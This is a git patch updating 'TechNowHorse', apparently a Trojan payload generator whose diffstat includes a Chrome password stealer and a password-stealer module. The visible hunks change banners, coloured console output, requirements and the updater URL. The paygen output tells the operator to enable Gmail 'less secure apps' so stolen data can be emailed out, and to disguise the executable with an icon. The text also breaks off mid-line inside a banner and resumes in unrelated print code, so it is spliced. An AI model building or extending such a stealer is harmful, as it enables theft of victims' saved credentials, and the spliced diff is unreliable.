From 4a9a332b5a1fb34c84a06cbfb9c94a9fdd8def5e Mon Sep 17 00:00:00 2001 From: Pushpender Singh Date: Wed, 20 Apr 2022 16:03:19 +0530 Subject: [PATCH] v1.7 [Using colorama + ChromePassStealerFix + PyinstallerPathFinderFix --- banners.py | 45 +----------- get_chrome_pass.py | 171 ++++++++++++++++++++++++++++++++++---------- password_stealer.py | 51 +++++++++++-- paygen.py | 143 ++++++++++++++++++++---------------- requirements.txt | 13 ++-- updater.py | 4 +- version.txt | 2 +- 7 files changed, 273 insertions(+), 156 deletions(-) diff --git a/banners.py b/banners.py index 9805ade..44f9e7d 100644 --- a/banners.py +++ b/banners.py @@ -65,27 +65,6 @@ """ -figlet_ogre = """ - - _____ _ __ -/__ \___ ___| |__ /\ \ \_____ __/\ /\___ _ __ ___ ___ - / /\/ _ \/ __| '_ \ / \/ / _ \ \ /\ / / /_/ / _ \| '__/ __|/ _ \ - / / | __/ (__| | | / /\ / (_) \ V V / __ / (_) | | \__ \ __/ - \/ \___|\___|_| |_\_\ \/ \___/ \_/\_/\/ /_/ \___/|_| |___/\___| - - -""" - -figlet_slant = """ - - ______ __ _ __ __ __ - /_ __/__ _____/ /_ / | / /___ _ __/ / / /___ _____________ - / / / _ \/ ___/ __ \/ |/ / __ \ | /| / / /_/ / __ \/ ___/ ___/ _ \ - / / / __/ /__/ / / / /| / /_/ / |/ |/ / __ / /_/ / / (__ ) __/ -/_/ \___/\___/_/ /_/_/ |_/\____/|__/|__/_/ /_/\____/_/ /____/\___/ - - -""" figlet_small = """ @@ -96,27 +75,7 @@ """ - -figlet_smslant = """ - - ______ __ _ __ __ __ -/_ __/__ ____/ / / |/ /__ _ __/ // /__ _______ ___ - / / / -_) __/ _ \/ / _ \ |/|/ / _ / _ \/ __(_-> {RED}--icon icon/exe.ico") + print(f"\n{Fore.GREEN}[+] Generated Successfully!\n") + print(f"\n\n{Fore.RED}[***] Don't forget to allow less secure applications in your Gmail account.") + print(f"{Fore.GREEN}Use the following link to do so https://myaccount.google.com/lesssecureapps") + print(f"\n{Fore.RED} :O-) TIP{Fore.YELLOW} : USE ICONS from {Fore.RED}icon{Fore.YELLOW} folder like this >> {Fore.RED}--icon icon/exe.ico") else: - print(f"\n{RED}[!] Failed To Generate Your Payload :(, Please Try Again!\n") - print(f"\n{GREEN}[:D] Please Contact us on https://github.com/PushpenderIndia/technowhorse\n") + print(f"\n{Fore.RED}[!] Failed To Generate Your Payload :(, Please Try Again!\n") + print(f"\n{Fore.GREEN}[:D] Please Contact us on https://github.com/PushpenderIndia/technowhorse\n") except KeyboardInterrupt: exit_greet() diff --git a/requirements.txt b/requirements.txt index 2dcbe15..3459605 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,9 @@ -mss==4.0.3 -essential_generators==0.9.2 +mss +colorama +requests +cryptography +essential_generators PyInstaller -six==1.12.0 -python-xlib==0.25 -py32win \ No newline at end of file +six +python-xlib +py32win diff --git a/updater.py b/updater.py index cb96c62..4d63a58 100644 --- a/updater.py +++ b/updater.py @@ -23,7 +23,7 @@ def exit_greet(): def main(): try: - version = urlopen("https://raw.githubusercontent.com/Technowlogy-Pushpender/technowhorse/master/version.txt").read() + version = urlopen("https://raw.githubusercontent.com/PushpenderIndia/technowhorse/master/version.txt").read() except Exception as e: print("[!] Unable to Fletch Origin version.txt") print("[!] Please Check Your Internet Connection!") @@ -40,7 +40,7 @@ def main(): if __name__ == '__main__': try: print(banners.get_banner()) - print(f"\t{YELLOW}Author: {GREEN}Pushpender | {YELLOW}Website: {GREEN}technowlogy.tk\n") + print(f"\t{YELLOW}Author: {GREEN}Pushpender | {YELLOW}GitHub: {GREEN}PushpenderIndia\n") print(f"{YELLOW}[*] Welcome to TechNowHorse's Auto Updater") print(f"{GREEN}[++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]") print(f"{YELLOW}[*] Please Note : Git must be installed in order to use \"updater.py\"") diff --git a/version.txt b/version.txt index 94737e7..3feeffa 100644 --- a/version.txt +++ b/version.txt @@ -1,2 +1,2 @@ -1.6 +1.7